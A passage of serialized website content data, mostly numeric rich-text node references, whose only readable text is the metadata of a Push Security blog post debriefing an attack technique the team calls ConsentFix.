34477,"data":34478},[],{},{"nodeType":186,"data":34480,"content":34481},{"uri":926},[34482],{"nodeType":173,"value":929,"marks":34483,"data":34484},[],{},{"nodeType":173,"value":933,"marks":34486,"data":34487},[],{},{"nodeType":186,"data":34489,"content":34490},{"uri":938},[34491],{"nodeType":173,"value":941,"marks":34492,"data":34493},[],{},{"nodeType":173,"value":945,"marks":34495,"data":34496},[],{},{"nodeType":186,"data":34498,"content":34499},{"uri":950},[34500],{"nodeType":173,"value":953,"marks":34501,"data":34502},[],{},{"nodeType":173,"value":957,"marks":34504,"data":34505},[],{},{"nodeType":231,"data":34507,"content":34508},{},[],{"nodeType":235,"data":34510,"content":34511},{},[34512],{"nodeType":173,"value":967,"marks":34513,"data":34515},[34514],{"type":370},{},{"nodeType":178,"data":34517,"content":34518},{},[34519],{"nodeType":173,"value":975,"marks":34520,"data":34523},[34521,34522],{"type":370},{"type":194},{},{"nodeType":178,"data":34525,"content":34526},{},[34527,34530,34537],{"nodeType":173,"value":984,"marks":34528,"data":34529},[],{},{"nodeType":186,"data":34531,"content":34532},{"uri":989},[34533],{"nodeType":173,"value":992,"marks":34534,"data":34536},[34535],{"type":194},{},{"nodeType":173,"value":997,"marks":34538,"data":34539},[],{},{"nodeType":178,"data":34541,"content":34542},{},[34543],{"nodeType":173,"value":1004,"marks":34544,"data":34547},[34545,34546],{"type":370},{"type":194},{},{"nodeType":178,"data":34549,"content":34550},{},[34551],{"nodeType":173,"value":1013,"marks":34552,"data":34553},[],{},{"nodeType":178,"data":34555,"content":34556},{},[34557],{"nodeType":173,"value":1020,"marks":34558,"data":34561},[34559,34560],{"type":370},{"type":194},{},{"nodeType":178,"data":34563,"content":34564},{},[34565,34568,34575,34578,34585],{"nodeType":173,"value":1029,"marks":34566,"data":34567},[],{},{"nodeType":186,"data":34569,"content":34570},{"uri":1034},[34571],{"nodeType":173,"value":1037,"marks":34572,"data":34574},[34573],{"type":194},{},{"nodeType":173,"value":1042,"marks":34576,"data":34577},[],{},{"nodeType":186,"data":34579,"content":34580},{"uri":1047},[34581],{"nodeType":173,"value":1050,"marks":34582,"data":34584},[34583],{"type":194},{},{"nodeType":173,"value":1055,"marks":34586,"data":34587},[],{},{"nodeType":312,"data":34589,"content":34592},{"target":34590},{"sys":34591},{"id":1062,"type":317,"linkType":318},[],{"nodeType":178,"data":34594,"content":34595},{},[34596],{"nodeType":173,"value":1068,"marks":34597,"data":34600},[34598,34599],{"type":370},{"type":194},{},{"nodeType":178,"data":34602,"content":34603},{},[34604],{"nodeType":173,"value":1077,"marks":34605,"data":34606},[],{},{"nodeType":312,"data":34608,"content":34611},{"target":34609},{"sys":34610},{"id":1084,"type":317,"linkType":318},[],{"nodeType":231,"data":34613,"content":34614},{},[],{"nodeType":235,"data":34616,"content":34617},{},[34618],{"nodeType":173,"value":1093,"marks":34619,"data":34621},[34620],{"type":370},{},{"nodeType":178,"data":34623,"content":34624},{},[34625],{"nodeType":173,"value":1101,"marks":34626,"data":34629},[34627,34628],{"type":370},{"type":194},{},{"nodeType":178,"data":34631,"content":34632},{},[34633],{"nodeType":173,"value":1110,"marks":34634,"data":34635},[],{},{"nodeType":250,"data":34637,"content":34638},{},[34639,34652,34665],{"nodeType":254,"data":34640,"content":34641},{},[34642],{"nodeType":178,"data":34643,"content":34644},{},[34645,34649],{"nodeType":173,"value":1123,"marks":34646,"data":34648},[34647],{"type":370},{},{"nodeType":173,"value":1128,"marks":34650,"data":34651},[],{},{"nodeType":254,"data":34653,"content":34654},{},[34655],{"nodeType":178,"data":34656,"content":34657},{},[34658,34662],{"nodeType":173,"value":1138,"marks":34659,"data":34661},[34660],{"type":370},{},{"nodeType":173,"value":1143,"marks":34663,"data":34664},[],{},{"nodeType":254,"data":34666,"content":34667},{},[34668],{"nodeType":178,"data":34669,"content":34670},{},[34671,34675,34678,34684],{"nodeType":173,"value":1153,"marks":34672,"data":34674},[34673],{"type":370},{},{"nodeType":173,"value":1158,"marks":34676,"data":34677},[],{},{"nodeType":186,"data":34679,"content":34680},{"uri":1163},[34681],{"nodeType":173,"value":1166,"marks":34682,"data":34683},[],{},{"nodeType":173,"value":1170,"marks":34685,"data":34686},[],{},{"nodeType":312,"data":34688,"content":34691},{"target":34689},{"sys":34690},{"id":1177,"type":317,"linkType":318},[],{"nodeType":231,"data":34693,"content":34694},{},[],{"nodeType":235,"data":34696,"content":34697},{},[34698],{"nodeType":173,"value":1186,"marks":34699,"data":34701},[34700],{"type":370},{},{"nodeType":178,"data":34703,"content":34704},{},[34705],{"nodeType":173,"value":1194,"marks":34706,"data":34709},[34707,34708],{"type":370},{"type":194},{},{"nodeType":178,"data":34711,"content":34712},{},[34713],{"nodeType":173,"value":1203,"marks":34714,"data":34715},[],{},{"nodeType":312,"data":34717,"content":34720},{"target":34718},{"sys":34719},{"id":1210,"type":317,"linkType":318},[],{"nodeType":231,"data":34722,"content":34723},{},[],{"nodeType":169,"data":34725,"content":34726},{},[34727],{"nodeType":173,"value":1219,"marks":34728,"data":34730},[34729],{"type":370},{},{"nodeType":178,"data":34732,"content":34733},{},[34734],{"nodeType":173,"value":1227,"marks":34735,"data":34736},[],{},{"nodeType":178,"data":34738,"content":34739},{},[34740],{"nodeType":173,"value":1234,"marks":34741,"data":34742},[],{},{"nodeType":250,"data":34744,"content":34745},{},[34746,34765,34784],{"nodeType":254,"data":34747,"content":34748},{},[34749],{"nodeType":178,"data":34750,"content":34751},{},[34752,34755,34762],{"nodeType":173,"value":1247,"marks":34753,"data":34754},[],{},{"nodeType":186,"data":34756,"content":34757},{"uri":1252},[34758],{"nodeType":173,"value":1255,"marks":34759,"data":34761},[34760],{"type":194},{},{"nodeType":173,"value":1260,"marks":34763,"data":34764},[],{},{"nodeType":254,"data":34766,"content":34767},{},[34768],{"nodeType":178,"data":34769,"content":34770},{},[34771,34774,34781],{"nodeType":173,"value":1270,"marks":34772,"data":34773},[],{},{"nodeType":186,"data":34775,"content":34776},{"uri":1275},[34777],{"nodeType":173,"value":1278,"marks":34778,"data":34780},[34779],{"type":194},{},{"nodeType":173,"value":1260,"marks":34782,"data":34783},[],{},{"nodeType":254,"data":34785,"content":34786},{},[34787],{"nodeType":178,"data":34788,"content":34789},{},[34790,34793,34800],{"nodeType":173,"value":1292,"marks":34791,"data":34792},[],{},{"nodeType":186,"data":34794,"content":34795},{"uri":1297},[34796],{"nodeType":173,"value":1300,"marks":34797,"data":34799},[34798],{"type":194},{},{"nodeType":173,"value":1260,"marks":34801,"data":34802},[],{},{"nodeType":178,"data":34804,"content":34805},{},[34806],{"nodeType":173,"value":1311,"marks":34807,"data":34808},[],{},{"nodeType":250,"data":34810,"content":34811},{},[34812,34825,34838,34851],{"nodeType":254,"data":34813,"content":34814},{},[34815],{"nodeType":178,"data":34816,"content":34817},{},[34818,34822],{"nodeType":173,"value":1324,"marks":34819,"data":34821},[34820],{"type":370},{},{"nodeType":173,"value":1329,"marks":34823,"data":34824},[],{},{"nodeType":254,"data":34826,"content":34827},{},[34828],{"nodeType":178,"data":34829,"content":34830},{},[34831,34835],{"nodeType":173,"value":1339,"marks":34832,"data":34834},[34833],{"type":370},{},{"nodeType":173,"value":1344,"marks":34836,"data":34837},[],{},{"nodeType":254,"data":34839,"content":34840},{},[34841],{"nodeType":178,"data":34842,"content":34843},{},[34844,34848],{"nodeType":173,"value":1354,"marks":34845,"data":34847},[34846],{"type":370},{},{"nodeType":173,"value":1359,"marks":34849,"data":34850},[],{},{"nodeType":254,"data":34852,"content":34853},{},[34854],{"nodeType":178,"data":34855,"content":34856},{},[34857,34861],{"nodeType":173,"value":1369,"marks":34858,"data":34860},[34859],{"type":370},{},{"nodeType":173,"value":1374,"marks":34862,"data":34863},[],{},{"nodeType":178,"data":34865,"content":34866},{},[34867],{"nodeType":173,"value":1381,"marks":34868,"data":34869},[],{},{"nodeType":231,"data":34871,"content":34872},{},[],{"nodeType":169,"data":34874,"content":34875},{},[34876],{"nodeType":173,"value":1391,"marks":34877,"data":34879},[34878],{"type":370},{},{"nodeType":178,"data":34881,"content":34882},{},[34883],{"nodeType":173,"value":1399,"marks":34884,"data":34885},[],{},{"nodeType":178,"data":34887,"content":34888},{},[34889],{"nodeType":173,"value":1406,"marks":34890,"data":34891},[],{},{"nodeType":312,"data":34893,"content":34896},{"target":34894},{"sys":34895},{"id":1413,"type":317,"linkType":318},[],{"nodeType":231,"data":34898,"content":34899},{},[],{"nodeType":169,"data":34901,"content":34902},{},[34903],{"nodeType":173,"value":1422,"marks":34904,"data":34906},[34905],{"type":370},{},{"nodeType":178,"data":34908,"content":34909},{},[34910],{"nodeType":173,"value":1430,"marks":34911,"data":34912},[],{},{"nodeType":178,"data":34914,"content":34915},{},[34916],{"nodeType":173,"value":1437,"marks":34917,"data":34918},[],{},{"nodeType":178,"data":34920,"content":34921},{},[34922],{"nodeType":173,"value":1444,"marks":34923,"data":34924},[],{},{"nodeType":178,"data":34926,"content":34927},{},[34928,34931,34938,34941,34948],{"nodeType":173,"value":1451,"marks":34929,"data":34930},[],{},{"nodeType":186,"data":34932,"content":34933},{"uri":1456},[34934],{"nodeType":173,"value":1459,"marks":34935,"data":34937},[34936],{"type":194},{},{"nodeType":173,"value":1464,"marks":34939,"data":34940},[],{},{"nodeType":186,"data":34942,"content":34943},{"uri":1469},[34944],{"nodeType":173,"value":1472,"marks":34945,"data":34947},[34946],{"type":194},{},{"nodeType":173,"value":1477,"marks":34949,"data":34950},[],{},{"items":34952},[34953,34955],{"sys":34954,"name":505},{"id":504},{"sys":34956,"name":509},{"id":508},{"items":34958},[34959],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":34960},{"url":1496},"content:blog:unpacking-the-latest-slh-campaign.json","blog/unpacking-the-latest-slh-campaign.json","blog/unpacking-the-latest-slh-campaign",{"_path":34965,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":34966,"ogImage":118,"summary":34968,"title":20500,"subtitle":118,"metaTitle":34979,"synopsis":20501,"hashTags":118,"publishedDate":20502,"slug":20503,"tagsCollection":34980,"relatedBlogPostsCollection":34986,"authorsCollection":37410,"content":37414,"_id":38142,"_type":5439,"_source":5440,"_file":38143,"_stem":38144,"_extension":5439},"/blog/consentfix-debrief",{"id":19699,"publishedAt":34967},"2026-01-14T09:27:38.375Z",{"json":34969},{"data":34970,"content":34971,"nodeType":165},{},[34972],{"data":34973,"content":34974,"nodeType":178},{},[34975],{"data":34976,"marks":34977,"value":34978,"nodeType":173},{},[],"In December, the Push Security research team discovered and blocked a brand new attack technique that we coined ConsentFix. We’re sharing some new insights on the campaign and pulling together some of the top recommendations and resources from across the community.","ConsentFix debrief: insights, recommendations & predictions",{"items":34981},[34982,34984],{"sys":34983,"name":509},{"id":508},{"sys":34985,"name":505},{"id":504},{"items":34987},[34988,35736,36277],{"__typename":1528,"sys":34989,"content":34990,"title":8598,"synopsis":8599,"hashTags":118,"publishedDate":8600,"slug":8601,"tagsCollection":35726,"authorsCollection":35732},{"id":7748},{"json":34991},{"nodeType":165,"data":34992,"content":34993},{},[34994,35001,35007,35013,35019,35029,35035,35040,35045,35048,35055,35061,35067,35072,35088,35094,35099,35105,35110,35116,35155,35160,35165,35171,35177,35180,35187,35203,35209,35214,35230,35235,35251,35257,35260,35267,35273,35309,35319,35322,35329,35344,35350,35363,35369,35375,35380,35386,35389,35396,35402,35450,35456,35459,35466,35471,35477,35483,35488,35494,35523,35529,35535,35540,35546,35551,35558,35574,35580,35610,35616,35646,35649,35656,35662,35667,35683,35689,35715,35720],{"nodeType":169,"data":34995,"content":34996},{},[34997],{"nodeType":173,"value":7757,"marks":34998,"data":35000},[34999],{"type":370},{},{"nodeType":178,"data":35002,"content":35003},{},[35004],{"nodeType":173,"value":7765,"marks":35005,"data":35006},[],{},{"nodeType":178,"data":35008,"content":35009},{},[35010],{"nodeType":173,"value":7772,"marks":35011,"data":35012},[],{},{"nodeType":178,"data":35014,"content":35015},{},[35016],{"nodeType":173,"value":7779,"marks":35017,"data":35018},[],{},{"nodeType":178,"data":35020,"content":35021},{},[35022,35026],{"nodeType":173,"value":7786,"marks":35023,"data":35025},[35024],{"type":370},{},{"nodeType":173,"value":7791,"marks":35027,"data":35028},[],{},{"nodeType":178,"data":35030,"content":35031},{},[35032],{"nodeType":173,"value":7798,"marks":35033,"data":35034},[],{},{"nodeType":312,"data":35036,"content":35039},{"target":35037},{"sys":35038},{"id":7805,"type":317,"linkType":318},[],{"nodeType":312,"data":35041,"content":35044},{"target":35042},{"sys":35043},{"id":7811,"type":317,"linkType":318},[],{"nodeType":231,"data":35046,"content":35047},{},[],{"nodeType":169,"data":35049,"content":35050},{},[35051],{"nodeType":173,"value":7820,"marks":35052,"data":35054},[35053],{"type":370},{},{"nodeType":178,"data":35056,"content":35057},{},[35058],{"nodeType":173,"value":7828,"marks":35059,"data":35060},[],{},{"nodeType":178,"data":35062,"content":35063},{},[35064],{"nodeType":173,"value":7835,"marks":35065,"data":35066},[],{},{"nodeType":312,"data":35068,"content":35071},{"target":35069},{"sys":35070},{"id":7842,"type":317,"linkType":318},[],{"nodeType":178,"data":35073,"content":35074},{},[35075,35078,35085],{"nodeType":173,"value":7848,"marks":35076,"data":35077},[],{},{"nodeType":186,"data":35079,"content":35080},{"uri":7853},[35081],{"nodeType":173,"value":7856,"marks":35082,"data":35084},[35083],{"type":194},{},{"nodeType":173,"value":7861,"marks":35086,"data":35087},[],{},{"nodeType":178,"data":35089,"content":35090},{},[35091],{"nodeType":173,"value":7868,"marks":35092,"data":35093},[],{},{"nodeType":312,"data":35095,"content":35098},{"target":35096},{"sys":35097},{"id":7875,"type":317,"linkType":318},[],{"nodeType":178,"data":35100,"content":35101},{},[35102],{"nodeType":173,"value":7881,"marks":35103,"data":35104},[],{},{"nodeType":312,"data":35106,"content":35109},{"target":35107},{"sys":35108},{"id":7888,"type":317,"linkType":318},[],{"nodeType":178,"data":35111,"content":35112},{},[35113],{"nodeType":173,"value":7894,"marks":35114,"data":35115},[],{},{"nodeType":250,"data":35117,"content":35118},{},[35119,35128,35137,35146],{"nodeType":254,"data":35120,"content":35121},{},[35122],{"nodeType":178,"data":35123,"content":35124},{},[35125],{"nodeType":173,"value":7907,"marks":35126,"data":35127},[],{},{"nodeType":254,"data":35129,"content":35130},{},[35131],{"nodeType":178,"data":35132,"content":35133},{},[35134],{"nodeType":173,"value":7917,"marks":35135,"data":35136},[],{},{"nodeType":254,"data":35138,"content":35139},{},[35140],{"nodeType":178,"data":35141,"content":35142},{},[35143],{"nodeType":173,"value":7927,"marks":35144,"data":35145},[],{},{"nodeType":254,"data":35147,"content":35148},{},[35149],{"nodeType":178,"data":35150,"content":35151},{},[35152],{"nodeType":173,"value":7937,"marks":35153,"data":35154},[],{},{"nodeType":312,"data":35156,"content":35159},{"target":35157},{"sys":35158},{"id":7944,"type":317,"linkType":318},[],{"nodeType":312,"data":35161,"content":35164},{"target":35162},{"sys":35163},{"id":7950,"type":317,"linkType":318},[],{"nodeType":178,"data":35166,"content":35167},{},[35168],{"nodeType":173,"value":7956,"marks":35169,"data":35170},[],{},{"nodeType":178,"data":35172,"content":35173},{},[35174],{"nodeType":173,"value":7963,"marks":35175,"data":35176},[],{},{"nodeType":231,"data":35178,"content":35179},{},[],{"nodeType":169,"data":35181,"content":35182},{},[35183],{"nodeType":173,"value":7973,"marks":35184,"data":35186},[35185],{"type":370},{},{"nodeType":178,"data":35188,"content":35189},{},[35190,35193,35200],{"nodeType":173,"value":7981,"marks":35191,"data":35192},[],{},{"nodeType":186,"data":35194,"content":35195},{"uri":7986},[35196],{"nodeType":173,"value":7989,"marks":35197,"data":35199},[35198],{"type":194},{},{"nodeType":173,"value":7994,"marks":35201,"data":35202},[],{},{"nodeType":178,"data":35204,"content":35205},{},[35206],{"nodeType":173,"value":8001,"marks":35207,"data":35208},[],{},{"nodeType":312,"data":35210,"content":35213},{"target":35211},{"sys":35212},{"id":8008,"type":317,"linkType":318},[],{"nodeType":178,"data":35215,"content":35216},{},[35217,35220,35227],{"nodeType":173,"value":8014,"marks":35218,"data":35219},[],{},{"nodeType":186,"data":35221,"content":35222},{"uri":1842},[35223],{"nodeType":173,"value":8021,"marks":35224,"data":35226},[35225],{"type":194},{},{"nodeType":173,"value":1477,"marks":35228,"data":35229},[],{},{"nodeType":312,"data":35231,"content":35234},{"target":35232},{"sys":35233},{"id":8032,"type":317,"linkType":318},[],{"nodeType":178,"data":35236,"content":35237},{},[35238,35241,35248],{"nodeType":173,"value":8038,"marks":35239,"data":35240},[],{},{"nodeType":186,"data":35242,"content":35243},{"uri":8043},[35244],{"nodeType":173,"value":8046,"marks":35245,"data":35247},[35246],{"type":194},{},{"nodeType":173,"value":8051,"marks":35249,"data":35250},[],{},{"nodeType":178,"data":35252,"content":35253},{},[35254],{"nodeType":173,"value":8058,"marks":35255,"data":35256},[],{},{"nodeType":231,"data":35258,"content":35259},{},[],{"nodeType":169,"data":35261,"content":35262},{},[35263],{"nodeType":173,"value":8068,"marks":35264,"data":35266},[35265],{"type":370},{},{"nodeType":178,"data":35268,"content":35269},{},[35270],{"nodeType":173,"value":8076,"marks":35271,"data":35272},[],{},{"nodeType":178,"data":35274,"content":35275},{},[35276,35279,35286,35289,35296,35299,35306],{"nodeType":173,"value":8083,"marks":35277,"data":35278},[],{},{"nodeType":186,"data":35280,"content":35281},{"uri":8088},[35282],{"nodeType":173,"value":8091,"marks":35283,"data":35285},[35284],{"type":194},{},{"nodeType":173,"value":933,"marks":35287,"data":35288},[],{},{"nodeType":186,"data":35290,"content":35291},{"uri":8100},[35292],{"nodeType":173,"value":1812,"marks":35293,"data":35295},[35294],{"type":194},{},{"nodeType":173,"value":8107,"marks":35297,"data":35298},[],{},{"nodeType":186,"data":35300,"content":35301},{"uri":8112},[35302],{"nodeType":173,"value":8115,"marks":35303,"data":35305},[35304],{"type":194},{},{"nodeType":173,"value":8120,"marks":35307,"data":35308},[],{},{"nodeType":178,"data":35310,"content":35311},{},[35312,35315],{"nodeType":173,"value":8127,"marks":35313,"data":35314},[],{},{"nodeType":173,"value":8131,"marks":35316,"data":35318},[35317],{"type":370},{},{"nodeType":231,"data":35320,"content":35321},{},[],{"nodeType":169,"data":35323,"content":35324},{},[35325],{"nodeType":173,"value":8142,"marks":35326,"data":35328},[35327],{"type":370},{},{"nodeType":178,"data":35330,"content":35331},{},[35332,35335,35341],{"nodeType":173,"value":8150,"marks":35333,"data":35334},[],{},{"nodeType":186,"data":35336,"content":35337},{"uri":6820},[35338],{"nodeType":173,"value":8157,"marks":35339,"data":35340},[],{},{"nodeType":173,"value":8161,"marks":35342,"data":35343},[],{},{"nodeType":178,"data":35345,"content":35346},{},[35347],{"nodeType":173,"value":8168,"marks":35348,"data":35349},[],{},{"nodeType":178,"data":35351,"content":35352},{},[35353,35356,35360],{"nodeType":173,"value":8175,"marks":35354,"data":35355},[],{},{"nodeType":173,"value":8179,"marks":35357,"data":35359},[35358],{"type":370},{},{"nodeType":173,"value":8184,"marks":35361,"data":35362},[],{},{"nodeType":178,"data":35364,"content":35365},{},[35366],{"nodeType":173,"value":8191,"marks":35367,"data":35368},[],{},{"nodeType":178,"data":35370,"content":35371},{},[35372],{"nodeType":173,"value":8198,"marks":35373,"data":35374},[],{},{"nodeType":312,"data":35376,"content":35379},{"target":35377},{"sys":35378},{"id":8205,"type":317,"linkType":318},[],{"nodeType":178,"data":35381,"content":35382},{},[35383],{"nodeType":173,"value":8211,"marks":35384,"data":35385},[],{},{"nodeType":231,"data":35387,"content":35388},{},[],{"nodeType":169,"data":35390,"content":35391},{},[35392],{"nodeType":173,"value":8221,"marks":35393,"data":35395},[35394],{"type":370},{},{"nodeType":178,"data":35397,"content":35398},{},[35399],{"nodeType":173,"value":8229,"marks":35400,"data":35401},[],{},{"nodeType":250,"data":35403,"content":35404},{},[35405,35414,35423,35432,35441],{"nodeType":254,"data":35406,"content":35407},{},[35408],{"nodeType":178,"data":35409,"content":35410},{},[35411],{"nodeType":173,"value":8242,"marks":35412,"data":35413},[],{},{"nodeType":254,"data":35415,"content":35416},{},[35417],{"nodeType":178,"data":35418,"content":35419},{},[35420],{"nodeType":173,"value":8252,"marks":35421,"data":35422},[],{},{"nodeType":254,"data":35424,"content":35425},{},[35426],{"nodeType":178,"data":35427,"content":35428},{},[35429],{"nodeType":173,"value":8262,"marks":35430,"data":35431},[],{},{"nodeType":254,"data":35433,"content":35434},{},[35435],{"nodeType":178,"data":35436,"content":35437},{},[35438],{"nodeType":173,"value":8272,"marks":35439,"data":35440},[],{},{"nodeType":254,"data":35442,"content":35443},{},[35444],{"nodeType":178,"data":35445,"content":35446},{},[35447],{"nodeType":173,"value":8282,"marks":35448,"data":35449},[],{},{"nodeType":178,"data":35451,"content":35452},{},[35453],{"nodeType":173,"value":8289,"marks":35454,"data":35455},[],{},{"nodeType":231,"data":35457,"content":35458},{},[],{"nodeType":169,"data":35460,"content":35461},{},[35462],{"nodeType":173,"value":8299,"marks":35463,"data":35465},[35464],{"type":370},{},{"nodeType":312,"data":35467,"content":35470},{"target":35468},{"sys":35469},{"id":8307,"type":317,"linkType":318},[],{"nodeType":178,"data":35472,"content":35473},{},[35474],{"nodeType":173,"value":8313,"marks":35475,"data":35476},[],{},{"nodeType":178,"data":35478,"content":35479},{},[35480],{"nodeType":173,"value":8320,"marks":35481,"data":35482},[],{},{"nodeType":312,"data":35484,"content":35487},{"target":35485},{"sys":35486},{"id":8327,"type":317,"linkType":318},[],{"nodeType":178,"data":35489,"content":35490},{},[35491],{"nodeType":173,"value":8333,"marks":35492,"data":35493},[],{},{"nodeType":250,"data":35495,"content":35496},{},[35497,35510],{"nodeType":254,"data":35498,"content":35499},{},[35500],{"nodeType":178,"data":35501,"content":35502},{},[35503,35507],{"nodeType":173,"value":8346,"marks":35504,"data":35506},[35505],{"type":370},{},{"nodeType":173,"value":8351,"marks":35508,"data":35509},[],{},{"nodeType":254,"data":35511,"content":35512},{},[35513],{"nodeType":178,"data":35514,"content":35515},{},[35516,35520],{"nodeType":173,"value":8361,"marks":35517,"data":35519},[35518],{"type":370},{},{"nodeType":173,"value":8366,"marks":35521,"data":35522},[],{},{"nodeType":178,"data":35524,"content":35525},{},[35526],{"nodeType":173,"value":8373,"marks":35527,"data":35528},[],{},{"nodeType":178,"data":35530,"content":35531},{},[35532],{"nodeType":173,"value":8380,"marks":35533,"data":35534},[],{},{"nodeType":312,"data":35536,"content":35539},{"target":35537},{"sys":35538},{"id":8387,"type":317,"linkType":318},[],{"nodeType":178,"data":35541,"content":35542},{},[35543],{"nodeType":173,"value":8393,"marks":35544,"data":35545},[],{},{"nodeType":312,"data":35547,"content":35550},{"target":35548},{"sys":35549},{"id":8400,"type":317,"linkType":318},[],{"nodeType":235,"data":35552,"content":35553},{},[35554],{"nodeType":173,"value":8406,"marks":35555,"data":35557},[35556],{"type":370},{},{"nodeType":178,"data":35559,"content":35560},{},[35561,35564,35571],{"nodeType":173,"value":8414,"marks":35562,"data":35563},[],{},{"nodeType":186,"data":35565,"content":35566},{"uri":8419},[35567],{"nodeType":173,"value":8422,"marks":35568,"data":35570},[35569],{"type":194},{},{"nodeType":173,"value":8427,"marks":35572,"data":35573},[],{},{"nodeType":178,"data":35575,"content":35576},{},[35577],{"nodeType":173,"value":8434,"marks":35578,"data":35579},[],{},{"nodeType":250,"data":35581,"content":35582},{},[35583,35592,35601],{"nodeType":254,"data":35584,"content":35585},{},[35586],{"nodeType":178,"data":35587,"content":35588},{},[35589],{"nodeType":173,"value":8447,"marks":35590,"data":35591},[],{},{"nodeType":254,"data":35593,"content":35594},{},[35595],{"nodeType":178,"data":35596,"content":35597},{},[35598],{"nodeType":173,"value":8457,"marks":35599,"data":35600},[],{},{"nodeType":254,"data":35602,"content":35603},{},[35604],{"nodeType":178,"data":35605,"content":35606},{},[35607],{"nodeType":173,"value":8467,"marks":35608,"data":35609},[],{},{"nodeType":178,"data":35611,"content":35612},{},[35613],{"nodeType":173,"value":8474,"marks":35614,"data":35615},[],{},{"nodeType":250,"data":35617,"content":35618},{},[35619,35628,35637],{"nodeType":254,"data":35620,"content":35621},{},[35622],{"nodeType":178,"data":35623,"content":35624},{},[35625],{"nodeType":173,"value":8487,"marks":35626,"data":35627},[],{},{"nodeType":254,"data":35629,"content":35630},{},[35631],{"nodeType":178,"data":35632,"content":35633},{},[35634],{"nodeType":173,"value":8497,"marks":35635,"data":35636},[],{},{"nodeType":254,"data":35638,"content":35639},{},[35640],{"nodeType":178,"data":35641,"content":35642},{},[35643],{"nodeType":173,"value":8507,"marks":35644,"data":35645},[],{},{"nodeType":231,"data":35647,"content":35648},{},[],{"nodeType":169,"data":35650,"content":35651},{},[35652],{"nodeType":173,"value":8517,"marks":35653,"data":35655},[35654],{"type":370},{},{"nodeType":178,"data":35657,"content":35658},{},[35659],{"nodeType":173,"value":8525,"marks":35660,"data":35661},[],{},{"nodeType":312,"data":35663,"content":35666},{"target":35664},{"sys":35665},{"id":8532,"type":317,"linkType":318},[],{"nodeType":178,"data":35668,"content":35669},{},[35670,35673,35680],{"nodeType":173,"value":8538,"marks":35671,"data":35672},[],{},{"nodeType":186,"data":35674,"content":35675},{"uri":6820},[35676],{"nodeType":173,"value":8545,"marks":35677,"data":35679},[35678],{"type":194},{},{"nodeType":173,"value":8550,"marks":35681,"data":35682},[],{},{"nodeType":178,"data":35684,"content":35685},{},[35686],{"nodeType":173,"value":8557,"marks":35687,"data":35688},[],{},{"nodeType":178,"data":35690,"content":35691},{},[35692,35695,35702,35705,35712],{"nodeType":173,"value":1451,"marks":35693,"data":35694},[],{},{"nodeType":186,"data":35696,"content":35697},{"uri":1456},[35698],{"nodeType":173,"value":1459,"marks":35699,"data":35701},[35700],{"type":194},{},{"nodeType":173,"value":1464,"marks":35703,"data":35704},[],{},{"nodeType":186,"data":35706,"content":35707},{"uri":1469},[35708],{"nodeType":173,"value":1472,"marks":35709,"data":35711},[35710],{"type":194},{},{"nodeType":173,"value":1477,"marks":35713,"data":35714},[],{},{"nodeType":312,"data":35716,"content":35719},{"target":35717},{"sys":35718},{"id":8590,"type":317,"linkType":318},[],{"nodeType":178,"data":35721,"content":35722},{},[35723],{"nodeType":173,"value":37,"marks":35724,"data":35725},[],{},{"items":35727},[35728,35730],{"sys":35729,"name":505},{"id":504},{"sys":35731,"name":509},{"id":508},{"items":35733},[35734],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":35735},{"url":8615},{"__typename":1528,"sys":35737,"content":35738,"title":6639,"synopsis":14583,"hashTags":118,"publishedDate":14584,"slug":6640,"tagsCollection":36267,"authorsCollection":36273},{"id":1702},{"json":35739},{"nodeType":165,"data":35740,"content":35741},{},[35742,35748,35754,35795,35800,35806,35812,35817,35822,35827,35830,35837,35843,35848,35854,35859,35864,35870,35875,35890,35893,35900,35906,35912,35918,35924,35929,35944,35947,35954,35960,36006,36012,36018,36021,36028,36034,36040,36046,36072,36075,36082,36098,36104,36143,36149,36188,36194,36260],{"nodeType":178,"data":35743,"content":35744},{},[35745],{"nodeType":173,"value":13992,"marks":35746,"data":35747},[],{},{"nodeType":178,"data":35749,"content":35750},{},[35751],{"nodeType":173,"value":13999,"marks":35752,"data":35753},[],{},{"nodeType":250,"data":35755,"content":35756},{},[35757,35776],{"nodeType":254,"data":35758,"content":35759},{},[35760],{"nodeType":178,"data":35761,"content":35762},{},[35763,35766,35773],{"nodeType":173,"value":14012,"marks":35764,"data":35765},[],{},{"nodeType":186,"data":35767,"content":35768},{"uri":14017},[35769],{"nodeType":173,"value":14020,"marks":35770,"data":35772},[35771],{"type":194},{},{"nodeType":173,"value":14025,"marks":35774,"data":35775},[],{},{"nodeType":254,"data":35777,"content":35778},{},[35779],{"nodeType":178,"data":35780,"content":35781},{},[35782,35785,35792],{"nodeType":173,"value":14035,"marks":35783,"data":35784},[],{},{"nodeType":186,"data":35786,"content":35787},{"uri":14040},[35788],{"nodeType":173,"value":14043,"marks":35789,"data":35791},[35790],{"type":194},{},{"nodeType":173,"value":14048,"marks":35793,"data":35794},[],{},{"nodeType":312,"data":35796,"content":35799},{"target":35797},{"sys":35798},{"id":14055,"type":317,"linkType":318},[],{"nodeType":178,"data":35801,"content":35802},{},[35803],{"nodeType":173,"value":14061,"marks":35804,"data":35805},[],{},{"nodeType":178,"data":35807,"content":35808},{},[35809],{"nodeType":173,"value":14068,"marks":35810,"data":35811},[],{},{"nodeType":312,"data":35813,"content":35816},{"target":35814},{"sys":35815},{"id":14075,"type":317,"linkType":318},[],{"nodeType":312,"data":35818,"content":35821},{"target":35819},{"sys":35820},{"id":14081,"type":317,"linkType":318},[],{"nodeType":312,"data":35823,"content":35826},{"target":35824},{"sys":35825},{"id":14087,"type":317,"linkType":318},[],{"nodeType":231,"data":35828,"content":35829},{},[],{"nodeType":169,"data":35831,"content":35832},{},[35833],{"nodeType":173,"value":14096,"marks":35834,"data":35836},[35835],{"type":370},{},{"nodeType":178,"data":35838,"content":35839},{},[35840],{"nodeType":173,"value":14104,"marks":35841,"data":35842},[],{},{"nodeType":312,"data":35844,"content":35847},{"target":35845},{"sys":35846},{"id":14111,"type":317,"linkType":318},[],{"nodeType":178,"data":35849,"content":35850},{},[35851],{"nodeType":173,"value":14117,"marks":35852,"data":35853},[],{},{"nodeType":312,"data":35855,"content":35858},{"target":35856},{"sys":35857},{"id":14124,"type":317,"linkType":318},[],{"nodeType":312,"data":35860,"content":35863},{"target":35861},{"sys":35862},{"id":14130,"type":317,"linkType":318},[],{"nodeType":178,"data":35865,"content":35866},{},[35867],{"nodeType":173,"value":14136,"marks":35868,"data":35869},[],{},{"nodeType":312,"data":35871,"content":35874},{"target":35872},{"sys":35873